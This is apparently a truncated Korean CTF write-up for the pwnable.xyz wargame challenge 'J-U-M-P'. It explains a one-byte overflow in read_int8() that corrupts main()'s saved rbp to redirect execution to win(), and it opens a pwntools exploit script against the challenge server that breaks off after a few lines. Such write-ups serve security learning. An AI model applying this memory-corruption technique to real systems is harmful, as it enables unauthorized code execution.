[pwnable.xyz] J-U-M-P
Wargame/pwnable.xyz
Jump aroundAttachmentThe Bugread_int8()에서 1바이트만큼 overflow가 발생한다. 이를 이용하여 main()의 rbp의 하위 1바이트를 임의의 값으로 조작할 수 있다.read_int8()의 return value는 rbp+0x11에 저장된다. rbp를 조작할 수 있기 때문에 결과적으로 main()의 스택 프레임에서 임의의 1바이트를 임의의 값으로 조작할 수 있다.Exploit원래 점프할 주소는 main+22인데, 마지막 1바이트를 0x77로 조작하면 win()으로 점프할 수 있다.from pwn import *r = remote("svc.pwnable.xyz", 30012)sla = r.sendlineaftersa = r.sendafter# get stack addres..